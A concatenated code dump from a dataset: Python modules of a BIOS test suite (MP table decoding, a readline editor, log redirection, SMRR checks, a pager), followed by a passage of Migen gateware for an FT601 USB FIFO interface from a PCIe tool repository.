self.add_field('enable', bool(bitfields.getbits(self.cpu_flags, 0)), "cpu_flags[0]={}")
self.add_field('bsp', bool(bitfields.getbits(self.cpu_flags, 1)), "cpu_flags[1]={}")
self.add_field('cpu_signature', u.unpack_one("<I"))
self.add_field('feature_flags', u.unpack_one("<I"))
self.add_field('reserved', u.unpack_one("<Q"))
self.fini()
class Bus(MpBaseStructure):
mp_structure_type = 1
def __init__(self, u):
super(Bus, self).__init__(u)
u = self.u
self.add_field('bus_id', u.unpack_one("B"))
self.add_field('bus_type', u.unpack_one("6s"))
self.fini()
class IOApic(MpBaseStructure):
mp_structure_type = 2
def __init__(self, u):
super(IOApic, self).__init__(u)
u = self.u
self.add_field('io_apic_id', u.unpack_one("B"))
self.add_field('io_apic_version', u.unpack_one("B"))
self.add_field('io_apic_flags', u.unpack_one("B"))
self.add_field('enable', bool(bitfields.getbits(self.io_apic_flags, 0)), "io_apic_flags[0]={}")
self.add_field('io_apic_address', u.unpack_one("<I"))
self.fini()
_int_types = {
0: 'INT',
1: 'NMI',
2: 'SMI',
3: 'ExtINT',
}
_polarity = {
0b00: 'Conforms to specifications of bus (for example, EISA is active-low for level-triggered interrupts)',
0b01: 'Active high',
0b10: 'Reserved',
0b11: 'Active low',
}
_trigger_modes = {
0b00: "Conforms to specifications of bus (for example, ISA is edge-triggered)",
0b01: "Edge-triggered",
0b10: "Reserved",
0b11: "Level-triggered",
}
class IOInterrupt(MpBaseStructure):
mp_structure_type = 3
def __init__(self, u):
super(IOInterrupt, self).__init__(u)
u = self.u
self.add_field('interrupt_type', u.unpack_one("B"), unpack.format_table("{}", _int_types))
self.add_field('io_interrupt_flags', u.unpack_one("B"))
self.add_field('polarity', bitfields.getbits(self.io_interrupt_flags, 1, 0), unpack.format_table("io_interrupt_flags[1:0]={}", _polarity))
self.add_field('trigger', bitfields.getbits(self.io_interrupt_flags, 3, 2), unpack.format_table("io_interrupt_flags[3:2]={}", _trigger_modes))
u.skip(1)
self.add_field('source_bus_id', u.unpack_one("B"))
self.add_field('source_bus_irq', u.unpack_one("B"))
self.add_field('destination_io_apic_id', u.unpack_one("B"))
self.add_field('destination_io_apic_int_pin', u.unpack_one("B"))
self.fini()
class LocalInterrupt(MpBaseStructure):
mp_structure_type = 4
def __init__(self, u):
super(LocalInterrupt, self).__init__(u)
u = self.u
self.add_field('interrupt_type', u.unpack_one("B"), unpack.format_table("{}", _int_types))
self.add_field('local_interrupt_flags', u.unpack_one("B"))
self.add_field('polarity', bitfields.getbits(self.local_interrupt_flags, 1, 0), unpack.format_table("local_interrupt_flags[1:0]={}", _polarity))
self.add_field('trigger', bitfields.getbits(self.local_interrupt_flags, 3, 2), unpack.format_table("local_interrupt_flags[3:2]={}", _trigger_modes))
u.skip(1)
self.add_field('source_bus_id', u.unpack_one("B"))
self.add_field('source_bus_irq', u.unpack_one("B"))
self.add_field('destination_local_apic_id', u.unpack_one("B"))
self.add_field('destination_local_apic_lint_pin', u.unpack_one("B"))
self.fini()
class MpBaseStructureUnknown(MpBaseStructure):
mp_structure_type = None
def __init__(self, u):
super(MpBaseStructureUnknown, self).__init__(u)
self.fini()
_base_structures = [
Processor,
Bus,
IOApic,
IOInterrupt,
LocalInterrupt,
MpBaseStructureUnknown, # Must always come last
]
class MpExtendedStructure(unpack.Struct):
def __new__(cls, u):
t = u.unpack_peek_one("B")
if cls.mp_structure_type is not None and t != cls.mp_structure_type:
return None
return super(MpExtendedStructure, cls).__new__(cls)
def __init__(self, u):
super(MpExtendedStructure, self).__init__()
self.start_offset = u.offset
entry_type, entry_length = u.unpack_peek("BB")
self.u = u.unpack_unpackable(entry_length)
self.raw_data = self.u.unpack_peek_rest()
self.add_field('entry_type', self.u.unpack_one("B"))
self.add_field('entry_length', self.u.unpack_one("B"))
def fini(self):
if not self.u.at_end():
self.add_field('data', self.u.unpack_rest())
del self.u
class SystemAddressSpaceMapping(MpExtendedStructure):
mp_structure_type = 128
def __init__(self, u):
super(SystemAddressSpaceMapping, self).__init__(u)
u = self.u
_address_types = {
0: "I/O address",
1: " Memory address",
2: "Prefetch address",
}
self.add_field('bus_id', u.unpack_one("B"))
self.add_field('address_type', u.unpack_one("B"), unpack.format_table("{}", _address_types))
self.add_field('address_base', u.unpack_one("<Q"))
self.add_field('address_length', u.unpack_one("<Q"))
self.fini()
class BusHierachyDescriptor(MpExtendedStructure):
mp_structure_type = 129
def __init__(self, u):
super(BusHierachyDescriptor, self).__init__(u)
u = self.u
self.add_field('bus_id', u.unpack_one("B"))
self.add_field('bus_info', u.unpack_one("B"))
self.add_field('subtractive_decode', bool(bitfields.getbits(self.bus_info, 0)), "bus_info[0]={}")
self.add_field('parent_bus', u.unpack_one("B"))
u.skip(3)
self.fini()
class CompatibilityBusAddressSpaceModifier(MpExtendedStructure):
mp_structure_type = 130
def __init__(self, u):
super(CompatibilityBusAddressSpaceModifier, self).__init__(u)
u = self.u
self.add_field('bus_id', u.unpack_one("B"))
self.add_field('address_modifier', u.unpack_one("B"))
self.add_field('predefined_list_subtracted', bool(bitfields.getbits(self.address_modifier, 0)), "address_modifier[0]={}")
self.add_field('predefined_range_list', u.unpack_one("<I"))
self.fini()
class MpExtendedStructureUnknown(MpExtendedStructure):
mp_structure_type = None
def __init__(self, u):
super(MpExtendedStructureUnknown, self).__init__(u)
self.fini()
_extended_structures = [
SystemAddressSpaceMapping,
BusHierachyDescriptor,
CompatibilityBusAddressSpaceModifier,
MpExtendedStructureUnknown, # Must always come last
]
def dump_raw():
try:
mp = MPTable()
s = "MP Table -- Raw bytes and structure decode.\n\n"
if mp:
s += str(mp.floating_pointer) + '\n'
s += bits.dumpmem(mp._floating_pointer_memory) + '\n'
s += str(mp.header) + '\n'
s += bits.dumpmem(mp._base_header_memory) + '\n'
for base_struct in mp.base_structures:
s += str(base_struct) + '\n'
s += bits.dumpmem(base_struct.raw_data) + '\n'
if mp.header.extended_table_length:
for extended_struct in mp.extended_structures:
s += str(extended_struct) + '\n'
s += bits.dumpmem(extended_struct.raw_data) + '\n'
else:
s += "MP Table not found.\n"
ttypager.ttypager_wrap(s, indent=False)
except:
print("Error parsing MP Table information:")
import traceback
traceback.print_exc()
def dump():
try:
mp = MPTable()
s = "MP Table -- Structure decode.\n\n"
if mp:
s += str(mp)
else:
s += "MP Table not found.\n"
ttypager.ttypager_wrap(s, indent=False)
except:
print("Error parsing MP Table information:")
import traceback
traceback.print_exc()
def register_tests():
testsuite.add_test("MP Table", test_mptable)
def test_mptable():
"""Test the MP Table"""
mp = MPTable()
if mp is None:
return
addr = bits.memory_addr(mp._floating_pointer_memory)
for address, size in bad_address_ranges:
if addr >= address and addr < address + size:
bad_address = True
break
else:
bad_address = False
testsuite.test('MP Floating Pointer Structure at spec-compliant address', not bad_address)
testsuite.print_detail('Found MP Floating Pointer Structure at bad address {:#x}'.format(addr))
testsuite.print_detail('MP Floating Pointer Structure must appear at a 16-byte-aligned address')
testsuite.print_detail('located, in order of preference, in:')
testsuite.print_detail('- the first kilobyte of the EBDA')
testsuite.print_detail('- the last kilobyte of system base memory (639k to 640k)')
testsuite.print_detail('- the 0xF0000 to 0xFFFFF block')
```
#### File: bits/python/readline.py
```python
import bits
import bits.input
import pager
import redirect
import string
import sys
__all__ = ["init", "get_completer", "set_completer", "parse_and_bind"]
width = []
height = []
line_x = []
line_y = []
buffer_max = 0
history = []
kill_ring = [] # Most recent last
kill_accumulate = False
ctrl_o_index = None
completer = None
def init():
"""Initialize the readline module and configure it as the Python readline callback."""
from _bits import _set_readline_callback
_set_readline_callback(_readline)
def insert_char(line_buffer, c, pos):
global buffer_max
if len(line_buffer) < buffer_max:
line_buffer = line_buffer[:pos] + c + line_buffer[pos:]
pos = pos + 1
return line_buffer, pos
def delete_char(line_buffer, pos):
if len(line_buffer) > 0:
line_buffer = line_buffer[:pos] + line_buffer[pos+1:]
return line_buffer, pos
def delete_char_left(line_buffer, pos):
if pos == 0:
return line_buffer, pos
line_buffer, temp_pos = delete_char(line_buffer, pos - 1)
return line_buffer, pos - 1
def insert_string(line_buffer, s, pos):
global buffer_max
chars_remaining = buffer_max - len(line_buffer)
if chars_remaining < len(s):
s = s[:chars_remaining]
line_buffer = line_buffer[:pos] + s + line_buffer[pos:]
insert_start = pos
pos = pos + len(s)
return line_buffer, insert_start, pos
def add_to_kill_ring(s, to_right):
global kill_ring, kill_accumulate
if kill_accumulate:
if to_right:
kill_ring[-1] = kill_ring[-1] + s
else:
kill_ring[-1] = s + kill_ring[-1]
else:
kill_ring.append(s)
kill_accumulate = True
def print_buffer(line_buffer, x, y, term):
global width, height, line_y
curr_pos = 0
while curr_pos < len(line_buffer):
bits.goto_xy(x, y, term)
max_width = width[term] - 1 - x
newline = False
if len(line_buffer) - curr_pos >= max_width:
partial_count = max_width
x = 0
y = y + 1
newline = True
else:
partial_count = len(line_buffer) - curr_pos
x = x + partial_count
bits.puts(line_buffer[curr_pos:curr_pos + partial_count], term)
if newline:
bits.puts('\n', term)
# check for scroll here and adjust start position
if y == height[term]:
y = y - 1
line_y[term] = line_y[term] - 1
curr_pos = curr_pos + partial_count
def PositionCursor(pos, x, y, term):
global width
curr_pos = 0
while curr_pos < pos:
max_width = width[term] - 1 - x
if pos - curr_pos >= max_width:
partial_count = max_width
x = 0
y = y + 1
else:
partial_count = pos - curr_pos
x = x + partial_count
curr_pos = curr_pos + partial_count
bits.goto_xy(x, y, term)
return(x, y)
def get_completer():
"""Get the readline completer function."""
global completer
return completer
def set_completer(f):
"""Set the readline completer function."""
global completer
completer = f
def parse_and_bind(s):
"""Stub parse_and_bind() function for compatibility with readline.
This module does not support readline's configuration syntax, so this
function does nothing."""
return None
key_hooks = {}
function_keys = set(getattr(bits.input, "KEY_F{}".format(n)) for n in range(1, 12+1))
def add_key_hook(key, func):
global key_hooks
assert key in function_keys
assert key_hooks.get(key) in (None, func)
key_hooks[key] = func
def _readline(prompt=""):
global width, height, line_x, line_y, buffer_max, history, kill_ring, kill_accumulate, ctrl_o_index, completer
with redirect.nolog():
with pager.nopager():
sys.stdout.write(prompt)
line_buffer = ''
pos = 0
prev_len = 0
term_count = bits.get_term_count()
width = [0] * term_count
height = [0] * term_count
line_x = [0] * term_count
line_y = [0] * term_count
for term in range(term_count):
width[term], height[term] = bits.get_width_height(term)
line_x[term], line_y[term] = bits.get_xy(term)
buffer_max = min((width[term] - 2 - line_x[term]) + ((height[term] - 1) * (width[term] - 1)) for term in range(term_count))
history_index = len(history)
history_state = dict()
completer_state = 0
last_yank_start = None
kill_accumulate = False
if ctrl_o_index is not None:
if ctrl_o_index < len(history):
history_index = ctrl_o_index
line_buffer = history[history_index]
pos = len(line_buffer)
ctrl_o_index = None
while True:
# Update history
history_state[history_index] = (line_buffer, pos)
try:
# clear any characters after the current line buffer
trailing_len = prev_len - len(line_buffer)
if trailing_len > 0:
for term in range(term_count):
trailing_x, trailing_y = PositionCursor(len(line_buffer), line_x[term], line_y[term], term)
print_buffer(" " * trailing_len, trailing_x, trailing_y, term)
prev_len = len(line_buffer)
for term in range(term_count):
# print the current line buffer
print_buffer(line_buffer, line_x[term], line_y[term], term)
# move the cursor to location of pos within the line buffer
PositionCursor(pos, line_x[term], line_y[term], term)
c = bits.input.get_key()
key = bits.input.key
def ctrl(k):
return key(k, ctrl=True)
# Reset states that depend on last key
if c != key('y', alt=True):
last_yank_start = None
if c not in (ctrl('k'), ctrl('u'), ctrl('w')):
kill_accumulate = False
if c == key('\r') or c == key('\n') or c == ctrl('o'):
if line_buffer or (history and history[-1]):
history.append(line_buffer)
if c == ctrl('o'): # Ctrl-O
ctrl_o_index = history_index + 1
sys.stdout.write('\n')
return line_buffer + '\n'
if not (c == key('\t') or c == ctrl('i')):
# reset completer state to force restart of the completer
completer_state = 0
if c == key(bits.input.KEY_HOME) or c == ctrl('a'):
# start of line
pos = 0
elif c == key(bits.input.KEY_LEFT) or c == ctrl('b'):
# left
if pos != 0:
pos -= 1
elif c == ctrl('d'):
# EOF
if len(line_buffer) == 0:
return ""
if pos < len(line_buffer):
line_buffer, pos = delete_char(line_buffer, pos)
elif c == key(bits.input.KEY_DELETE):
if pos < len(line_buffer):
line_buffer, pos = delete_char(line_buffer, pos)
elif c == key(bits.input.KEY_END) or c == ctrl('e'):
# end of line
pos = len(line_buffer)
elif c == key(bits.input.KEY_RIGHT) or c == ctrl('f'):
# right
if pos != len(line_buffer):
pos += 1
elif c == key('\b') or c == ctrl('h'):
# backspace
line_buffer, pos = delete_char_left(line_buffer, pos)
elif c == key('\t') or c == ctrl('i'):
# tab completion
if completer is not None:
if completer_state != 0:
for c in range(len(current_completion)):
line_buffer, pos = delete_char_left(line_buffer, pos)
else:
cur = pos
while pos != 0 and line_buffer[pos-1] != ' ':
pos -= 1
saved_str = line_buffer[pos:cur]
line_buffer = line_buffer[:pos] + line_buffer[cur:]
current_completion = completer(saved_str, completer_state)
completer_state += 1
if current_completion is not None:
for c in current_completion:
line_buffer, pos = insert_char(line_buffer, c, pos)
else:
for c in saved_str:
line_buffer, pos = insert_char(line_buffer, c, pos)
completer_state = 0
elif c == ctrl('k'):
# delete from current to end of line
killed_text = line_buffer[pos:]
line_buffer = line_buffer[:pos]
add_to_kill_ring(killed_text, to_right=True)
elif c == ctrl('l'):
# clear screen
bits.clear_screen()
sys.stdout.write(prompt)
for term in range(term_count):
line_x[term], line_y[term] = bits.get_xy(term);
elif c == key(bits.input.KEY_DOWN) or c == ctrl('n'):
# Next line in history
if history_index < len(history):
history_index += 1
if history_index == len(history):
line_buffer, pos = history_state.get(history_index, ('', 0))
else:
line_buffer, pos = history_state.get(history_index, (history[history_index], len(history[history_index])))
elif c == key(bits.input.KEY_UP) or c == ctrl('p'):
# Previous line in history
if history_index > 0:
history_index -= 1
line_buffer, pos = history_state.get(history_index, (history[history_index], len(history[history_index])))
elif c == ctrl('u'):
# delete from current to beginning of line
killed_text = line_buffer[:pos]
line_buffer = line_buffer[pos:]
pos = 0
add_to_kill_ring(killed_text, to_right=False)
elif c == ctrl(bits.input.KEY_LEFT):
# Move left by word
while pos != 0 and not line_buffer[pos-1].isalnum():
pos -= 1
while pos != 0 and line_buffer[pos-1].isalnum():
pos -= 1
elif c == ctrl(bits.input.KEY_RIGHT):
# Move right by word
end = len(line_buffer)
while pos != end and not line_buffer[pos].isalnum():
pos += 1
while pos != end and line_buffer[pos].isalnum():
pos += 1
elif c == ctrl('w'):
# delete previous word; note that this uses a different
# definition of "word" than Ctrl-Left and Ctrl-Right.
cur = pos
while pos != 0 and line_buffer[pos-1] == ' ':
pos -= 1
while pos != 0 and line_buffer[pos-1] != ' ':
pos -= 1
killed_text = line_buffer[pos:cur]
line_buffer = line_buffer[:pos] + line_buffer[cur:]
add_to_kill_ring(killed_text, to_right=False)
elif c == ctrl('y'):
# Yank
if kill_ring:
line_buffer, last_yank_start, pos = insert_string(line_buffer, kill_ring[-1], pos)
elif c == key('y', alt=True):
# If immediately after yank, rotate kill ring and yank
# the new top instead.
if last_yank_start is not None:
line_buffer = line_buffer[:last_yank_start] + line_buffer[pos:]
pos = last_yank_start
kill_ring.insert(0, kill_ring.pop()) # Rotate
line_buffer, last_yank_start, pos = insert_string(line_buffer, kill_ring[-1], pos)
elif c == ctrl('z') or c == key(bits.input.KEY_ESC):
if len(line_buffer) == 0:
return ""
elif c.key in key_hooks:
key_hooks[c.key]()
elif not(c.ctrl) and not(c.alt) and isinstance(c.key, basestring) and c.key in string.printable:
# printable
try:
line_buffer, pos = insert_char(line_buffer, c.key.encode('ascii'), pos)
except UnicodeError:
pass
else:
pass
except IOError:
pass
```
#### File: bits/python/redirect.py
```python
import bits as _bits
import bits.pyfs
import struct as _struct
import sys as _sys
import bitsversion
import contextlib
__all__ = ["redirect", "write_logfile", "clear", "log", "logonly", "nolog"]
NOLOG_STATE, LOGONLY_STATE, LOG_STATE = range(3)
state = LOG_STATE
class Tee(object):
"""Tee output to both input files provided."""
def __init__(self, out1, out2):
self.out1 = out1
self.out2 = out2
def write(self, data):
self.out1.write(data)
self.out2.write(data)
def flush(self):
self.out1.flush()
self.out2.flush()
# Create the log file
_log = bits.pyfs.pyfs_file("log")
def write_logfile(filename):
f = file(filename)
data, blocks = _bits.file_data_and_disk_blocks(f)
total_size = len(data)
logdata = _log.getvalue()[:total_size].ljust(total_size, "\n")
bytes_written = 0
for sector, offset, length in blocks:
chunk = logdata[bytes_written:bytes_written+length]
if chunk != data[bytes_written:bytes_written+length]:
_bits.disk_write(f, sector, offset, logdata[bytes_written:bytes_written+length])
bytes_written += length
def _log_header():
print >>_log, "BIOS Implementation Test Suite (BITS)"
print >>_log, "bits-{}, build ID {}".format(bitsversion.buildnum, bitsversion.buildid)
print >>_log
def redirect():
"""Redirect all screen outputs (stdout and stderr) to a log file.
Not to be called except as part of system initialization."""
global _orig_stdout, _orig_stderr
_log_header()
_orig_stdout = _sys.stdout
_orig_stderr = _sys.stderr
_sys.stdout = Tee(_orig_stdout, _log)
_sys.stderr = Tee(_orig_stderr, _log)
def clear():
"""Clear the log file."""
_log.truncate(0)
_log_header()
@contextlib.contextmanager
def _redirect_stdout(f):
old_stdout = _sys.stdout
try:
_sys.stdout = f
yield
finally:
_sys.stdout = old_stdout
@contextlib.contextmanager
def _redirect_stderr(f):
old_stderr = _sys.stderr
try:
_sys.stderr = f
yield
finally:
_sys.stderr = old_stderr
@contextlib.contextmanager
def log():
"""with log() sends stdout/stderr to both the screen and the log file"""
global state
saved_state = state
state = LOG_STATE
with _redirect_stdout(Tee(_orig_stdout, _log)):
with _redirect_stderr(Tee(_orig_stderr, _log)):
yield
state = saved_state
@contextlib.contextmanager
def logonly():
"""with logonly() sends stdout to the log only, and stderr to both screen and log"""
global state
saved_state = state
state = LOGONLY_STATE
with _redirect_stdout(_log):
with _redirect_stderr(Tee(_orig_stderr, _log)):
yield
state = saved_state
@contextlib.contextmanager
def nolog():
"""with nolog() sends stdout/stderr to the screen only"""
global state
saved_state = state
state = NOLOG_STATE
with _redirect_stdout(_orig_stdout):
with _redirect_stderr(_orig_stderr):
yield
state = saved_state
```
#### File: bits/python/rlcompleter_extra.py
```python
def undercmp(s1, s2):
"""Compare two strings, sorting leading underscores last."""
if s1.startswith("_"):
if s2.startswith("_"):
return undercmp(s1[1:], s2[1:])
return 1
if s2.startswith("_"):
return -1
return cmp(s1, s2)
def attr_matches(self, text):
"""Compute matches when text contains a dot.
Assuming the text is of the form NAME.NAME....[NAME], and is
evaluatable in self.namespace, it will be evaluated and its attributes
(as revealed by dir()) are used as possible completions. (For class
instances, class members are also considered.)
WARNING: this can still invoke arbitrary C code, if an object
with a __getattr__ hook is evaluated.
"""
import re
m = re.match(r"([\w\[\]]+(\.[\w\[\]]+)*)\.(\w*)", text)
if not m:
return []
expr, attr = m.group(1, 3)
try:
thisobject = eval(expr, self.namespace)
except Exception:
return []
# get the content of the object, except __builtins__
words = dir(thisobject)
if "__builtins__" in words:
words.remove("__builtins__")
if hasattr(thisobject, '__class__'):
words.append('__class__')
words.extend(rlcompleter.get_class_members(thisobject.__class__))
matches = []
n = len(attr)
for word in sorted(set(words), cmp=undercmp):
if word[:n] == attr and hasattr(thisobject, word):
val = getattr(thisobject, word)
word = self._callable_postfix(val, "%s.%s" % (expr, word))
matches.append(word)
return matches
import readline
import rlcompleter
Completer = rlcompleter.Completer
Completer.attr_matches = attr_matches
readline.set_completer(Completer().complete)
```
#### File: bits/python/testsmrr.py
```python
import bits
import testmsr
import testsuite
def register_tests():
testsuite.add_test("SMRR configuration", test_smrr)
def test_smrr():
"""Test the SMRR-related configuration"""
cpus = sorted(bits.cpus())
if not testmsr.test_msr_consistency(text='IA32_MTRRCAP Bit [11] (SMRR Supported) must be consistent', first_msr=0xfe, shift=11, mask=1):
return
ia32_mtrrcap = bits.rdmsr(cpus[0], 0xfe)
if ia32_mtrrcap is not None and not ia32_mtrrcap & (1 << 11):
return
if testmsr.msr_available(0x1f2) and testmsr.msr_available(0x1f3):
MSR_SMRR_PHYS_BASE = 0x1f2
MSR_SMRR_PHYS_MASK = 0x1f3
elif testmsr.msr_available(0xa0) and testmsr.msr_available(0xa1):
MSR_SMRR_PHYS_BASE = 0xa0
MSR_SMRR_PHYS_MASK = 0xa1
return
else:
return
testmsr.test_msr_consistency(text='SMRR must be consistent across all processors', first_msr=MSR_SMRR_PHYS_BASE, last_msr=MSR_SMRR_PHYS_MASK)
for apicid in cpus:
smrr_physbase, smrr_physbase_str = testmsr.MSR('SMRR Physbase', apicid, MSR_SMRR_PHYS_BASE, 31, 12)
smrr_type, smrr_type_str = testmsr.MSR('SMRR Type', apicid, MSR_SMRR_PHYS_BASE, 2, 0)
smrr_physmask, smrr_physmask_str = testmsr.MSR('SMRR Physmask', apicid, MSR_SMRR_PHYS_MASK, 31, 12)
smrr_valid, smrr_valid_str = testmsr.MSR('SMRR Valid', apicid, MSR_SMRR_PHYS_MASK, 11, 11)
testsuite.test('SMRR_PHYSBASE must be aligned on an 8MB boundary', (smrr_physbase % 0x800) == 0)
testsuite.print_detail(smrr_physbase_str)
testsuite.print_detail('SMRR_PHYSBASE % 0x800 must be 0')
testsuite.test('SMRR Type must be Write-Back (Best performance)', smrr_type == 6)
testsuite.print_detail(smrr_type_str)
testsuite.print_detail('SMRR Type must be 6')
testsuite.test('SMRR size must be at least 8MB', smrr_physmask >= 0x800)
testsuite.print_detail(smrr_physmask_str)
testsuite.print_detail('SMRR Physmask must be >= 0x800')
testsuite.test('SMRR Valid bit must be 1', smrr_valid)
testsuite.print_detail(smrr_valid_str)
```
#### File: bits/python/ttypager.py
```python
import bits
import bits.input
import contextlib
import itertools
import os
import os.path
import pager
import redirect
import string
import sys
import textwrap
from cStringIO import StringIO
def getpager():
return ttypager
def plain(text):
"""Remove boldface formatting from text."""
import re
return re.sub('.\b', '', text)
def ttypager(text):
"""Page through text on a text terminal."""
try:
import efi
import readline
efi_options = ["f to write file"]
except ImportError as e:
efi_options = []
lines = string.split(plain(text), '\n')
if redirect.state != redirect.NOLOG_STATE:
with redirect.logonly():
sys.stdout.write(string.join(lines, '\n') + '\n')
if redirect.state == redirect.LOGONLY_STATE:
return
with pager.nopager():
with redirect.nolog():
height = min(bits.get_width_height(term)[1] for term in range(bits.get_term_count()))
r = inc = height - 1
sys.stdout.write(string.join(lines[:inc], '\n') + '\n')
while True:
if lines[r:]:
advance = ['any key to advance']
else:
advance = ['END']
if r > inc:
back = ["Up/PgUp to go back"]
else:
back = []
options = "; ".join(advance + back + efi_options + ["q to quit"])
prompt = '-- {} --'.format(options)
prompt_len = len(prompt)
sys.stdout.write(prompt)
c = bits.input.get_key()
key = bits.input.key
# Write the spaces one at a time to defeat word-wrap
sys.stdout.write('\r')
for i in range(prompt_len):
sys.stdout.write(' ')
sys.stdout.write('\r')
if efi_options and c in (key('f'), key('F')):
ttydir = efi.get_boot_fs()
filepath = os.path.normpath(str.strip(readline._readline("filename: "), "\n"))
basepath, fname = os.path.split(filepath)
for dirname in str.split(basepath, os.sep):
if dirname is not "":
ttydir = ttydir.mkdir(dirname)
print "Saving {}...".format(filepath),
ttydir.create(fname).write(string.join(lines, '\n') + '\n')
print "Done"
print "Hit any key to continue..."
c = bits.input.get_key()
if c in (key('q'), key('Q')):
break
elif c in (key('\r'), key('\n'), key(bits.input.KEY_DOWN), key('n', ctrl=True)):
if lines[r:]:
sys.stdout.write(lines[r] + '\n')
r = r + 1
continue
if c == key(bits.input.KEY_HOME):
bits.clear_screen()
r = 0
if c == key(bits.input.KEY_END):
bits.clear_screen()
r = len(lines) - inc
if r < 0:
r = 0
if c in (key(bits.input.KEY_UP), key('p', ctrl=True)):
bits.clear_screen()
r = r - 1 - inc
if r < 0:
r = 0
if c in (key(bits.input.KEY_PAGE_UP), key('b'), key('B')):
bits.clear_screen()
r = r - inc - inc
if r < 0:
r = 0
if lines[r:]:
sys.stdout.write(string.join(lines[r:r+inc], '\n') + '\n')
r = r + inc
if not lines[r:]:
r = len(lines)
_wrapper = textwrap.TextWrapper(width=77, subsequent_indent=' ')
_wrapper_indentall = textwrap.TextWrapper(width=77, initial_indent=' ', subsequent_indent=' ')
def _wrap(str, indent=True):
def __wrap():
wrapper = _wrapper
for line in str.split("\n"):
# Preserve blank lines, for which wrapper emits an empty list
if not line:
yield ""
for wrapped_line in wrapper.wrap(line):
yield wrapped_line
if indent:
wrapper = _wrapper_indentall
return '\n'.join(__wrap())
def ttypager_wrap(text, indent=True):
ttypager(_wrap(text, indent))
class ProgressStringIO(object):
def __init__(self):
self.progress = itertools.cycle('|/-\\')
self.gathering = 'Gathering output...'
with pager.nopager():
with redirect.nolog():
sys.stdout.write('\r' + self.gathering)
self.sio = StringIO()
def write(self, s):
with pager.nopager():
with redirect.nolog():
sys.stdout.write('\r' + self.gathering + self.progress.next())
self.sio.write(s)
def getvalue(self):
with pager.nopager():
with redirect.nolog():
sys.stdout.write('\r' + ' ' * (len(self.gathering) + 1) + '\r')
return self.sio.getvalue()
def __getattr__(self, name):
return getattr(self.sio, name)
@contextlib.contextmanager
def page():
"""Capture output to stdout/stderr, and send it through ttypager when done"""
out = ProgressStringIO()
with redirect._redirect_stdout(out):
with redirect._redirect_stderr(out):
try:
yield
output = out.getvalue()
except:
import traceback
output = (traceback.format_exc()
+ "\nOutput produced before exception:\n\n"
+ out.getvalue())
ttypager_wrap(output, indent=False)
``` |
{
"source": "3mdeb/pcie_screamer",
"score": 2
} |
#### File: pcie_screamer/gateware/ft601.py
```python
from migen import *
from migen.fhdl.specials import Tristate
from litex.soc.interconnect import stream
from litex.soc.cores.usb_fifo import phy_description
class FT601Sync(Module):
def __init__(self, pads, dw=32, timeout=1024):
read_fifo = ClockDomainsRenamer({"write": "usb", "read": "sys"})(stream.AsyncFIFO(phy_description(dw), 128))
write_fifo = ClockDomainsRenamer({"write": "sys", "read": "usb"})(stream.AsyncFIFO(phy_description(dw), 128))
read_buffer = ClockDomainsRenamer("usb")(stream.SyncFIFO(phy_description(dw), 4))
self.comb += read_buffer.source.connect(read_fifo.sink)
self.submodules += read_fifo
self.submodules += read_buffer
self.submodules += write_fifo
self.read_buffer = read_buffer
self.sink = write_fifo.sink
self.source = read_fifo.source
self.tdata_w = tdata_w = Signal(dw)
self.data_r = data_r = Signal(dw)
self.data_oe = data_oe = Signal()
self.specials += Tristate(pads.data, tdata_w, data_oe, data_r)
data_w = Signal(dw)
_data_w = Signal(dw)
self.sync.usb += [
_data_w.eq(data_w)
]
for i in range(dw):
self.specials += [
Instance("ODDR",
p_DDR_CLK_EDGE="SAME_EDGE",
i_C=ClockSignal("usb"), i_CE=1, i_S=0, i_R=0,
i_D1=_data_w[i], i_D2=data_w[i], o_Q=tdata_w[i]
)
]
self.rd_n = rd_n = Signal()
_rd_n = Signal(reset=1)
self.wr_n = wr_n = Signal()
_wr_n = Signal(reset=1)
self.oe_n = oe_n = Signal()
_oe_n = Signal(reset=1)
self.sync.usb += [
_rd_n.eq(rd_n),
_wr_n.eq(wr_n),
_oe_n.eq(oe_n),
]
self.specials += [
Instance("ODDR",
p_DDR_CLK_EDGE="SAME_EDGE",
i_C=ClockSignal("usb"), i_CE=1, i_S=0, i_R=0,
i_D1=_rd_n, i_D2=rd_n, o_Q=pads.rd_n
),
Instance("ODDR",
p_DDR_CLK_EDGE="SAME_EDGE",
i_C=ClockSignal("usb"), i_CE=1, i_S=0, i_R=0,
i_D1=_wr_n, i_D2=wr_n, o_Q=pads.wr_n
),
Instance("ODDR",
p_DDR_CLK_EDGE="SAME_EDGE",
i_C=ClockSignal("usb"), i_CE=1, i_S=0, i_R=0,
i_D1=_oe_n, i_D2=oe_n, o_Q=pads.oe_n
)
]
self.comb += [
pads.rst.eq(~ResetSignal("usb")),
pads.be.eq(0xf),
pads.siwua.eq(1),
data_oe.eq(oe_n),
]
fsm = FSM()
self.submodules.fsm = ClockDomainsRenamer("usb")(fsm)
self.tempsendval = tempsendval = Signal(dw)
self.temptosend = temptosend = Signal()
self.tempreadval = tempreadval = Signal(dw)
self.temptoread = temptoread = Signal()
self.wants_read = wants_read = Signal()
self.wants_write = wants_write = Signal()
self.cnt_write = cnt_write = Signal(max=timeout+1)
self.cnt_read = cnt_read = Signal(max=timeout+1)
first_write = Signal()
self.comb += [
wants_read.eq(~temptoread & ~pads.rxf_n),
wants_write.eq((temptosend | write_fifo.source.valid) & (pads.txe_n == 0)),
]
self.fsmstate = Signal(4)
self.comb += [
self.fsmstate.eq(Cat(fsm.ongoing("IDLE"),
fsm.ongoing("WRITE"),
fsm.ongoing("RDWAIT"),
fsm.ongoing("READ")))
]
self.sync.usb += [
If(~fsm.ongoing("READ"),
If(temptoread,
If(read_buffer.sink.ready,
temptoread.eq(0)
)
)
)
]
self.comb += [
If(~fsm.ongoing("READ"),
If(temptoread,
read_buffer.sink.data.eq(tempreadval),
read_buffer.sink.valid.eq(1),
)
)
]
fsm.act("IDLE",
rd_n.eq(1),
wr_n.eq(1),
If(wants_write,
oe_n.eq(1),
NextValue(cnt_write, 0),
NextValue(first_write, 1),
NextState("WRITE"),
).Elif(wants_read,
oe_n.eq(0),
NextState("RDWAIT")
).Else(
oe_n.eq(1),
)
)
fsm.act("WRITE",
If(wants_read,
NextValue(cnt_write, cnt_write + 1),
),
NextValue(first_write, 0),
rd_n.eq(1),
If(pads.txe_n,
oe_n.eq(1),
wr_n.eq(1),
write_fifo.source.ready.eq(0),
If(write_fifo.source.valid & ~first_write,
NextValue(temptosend, 1)
),
NextState("IDLE")
).Elif(temptosend,
oe_n.eq(1),
data_w.eq(tempsendval),
wr_n.eq(0),
NextValue(temptosend, 0)
).Elif(cnt_write > timeout,
oe_n.eq(0),
NextState("RDWAIT")
